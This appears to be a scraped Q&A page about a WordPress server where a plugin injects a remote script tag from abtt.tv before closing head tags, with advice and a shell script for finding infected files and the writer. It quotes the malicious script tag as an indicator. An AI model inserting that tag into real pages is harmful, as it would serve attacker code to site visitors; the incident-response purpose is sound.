Question

It appears there is a new exploit/hack going around where a WordPress plugin is writing a .js file before every closing </head> tag in every WordPress installation's .php files on my server. It's writing this code before every closing head tag:

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

My question is, how would I go about finding which files are writing code to others? That way I can find which plugin is doing it, as I have several installations of WP in subdomains that are infected, and no idea which one it's coming from! I'm sure there has to be a way to monitor this, whether it be my hosting company doing it or me.

Solution

If your site has been compromised, you're better off restoring a backup, but if you don't have one you're probably better off with a clean installation. But if you still wanna try to "fix" it, there are some files you could check for starters: the header theme file, the function file and all the plugin files, to ensure it's not enqueued in a plugin to run.

The function you should be searching for is called wp_enqueue_script.
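
One way to run that search across several installations at once, as an added example that is not part of the original answer. The indicator host comes from the tag quoted in the question; the function names, the file-write heuristic and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example; INDICATOR is the host in the tag quoted in the question.
INDICATOR='abtt.tv'

# PHP files that already carry the injected tag (the cleanup list).
infected_files() {
    find "$1" -type f -name '*.php' -exec grep -lF -- "$INDICATOR" {} + | sort
}

# Every wp_enqueue_script call, with file and line number, for manual review.
# /dev/null forces grep to print the file name even for a single match file.
enqueue_calls() {
    find "$1" -type f -name '*.php' \
        -exec grep -nF -- 'wp_enqueue_script' /dev/null {} + | sort
}

# Heuristic (an assumption, not from the post): a PHP file that mentions the
# closing head tag AND calls a file-writing function is a candidate for the
# code that rewrites other files. Review each hit by hand.
candidate_writers() {
    find "$1" -type f -name '*.php' -exec grep -lF -- '</head>' {} + |
    while IFS= read -r f; do
        if grep -qE '(file_put_contents|fwrite|fputs)[[:space:]]*\(' "$f"; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# Constructed sample tree (not real site data) so the script runs offline.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/site1/wp-content/themes/t" "$d/site1/wp-content/plugins/p"
    printf '%s\n' '<head><script src="http://abtt.tv/modules/mod_servises/ua.js"></script></head>' \
        > "$d/site1/wp-content/themes/t/header.php"
    printf '%s\n' '<?php wp_enqueue_script("slider", plugins_url("s.js", __FILE__));' \
        > "$d/site1/wp-content/themes/t/functions.php"
    printf '%s\n' '<?php $c = file_get_contents($f); if (strpos($c, "</head>") !== false) { file_put_contents($f, $c); }' \
        > "$d/site1/wp-content/plugins/p/p.php"
    printf '%s\n' "$d"
}

# Usage: sh scan.sh /path/to/webroot
if [ "${1:-}" != "" ]; then
    echo "== infected ==";          infected_files "$1"
    echo "== enqueue calls ==";     enqueue_calls "$1"
    echo "== candidate writers =="; candidate_writers "$1"
fi
```

Sorting the infected list by modification time (for example with ls -lt) and comparing it with the web server access log around that time helps narrow down which installation was hit first.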

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow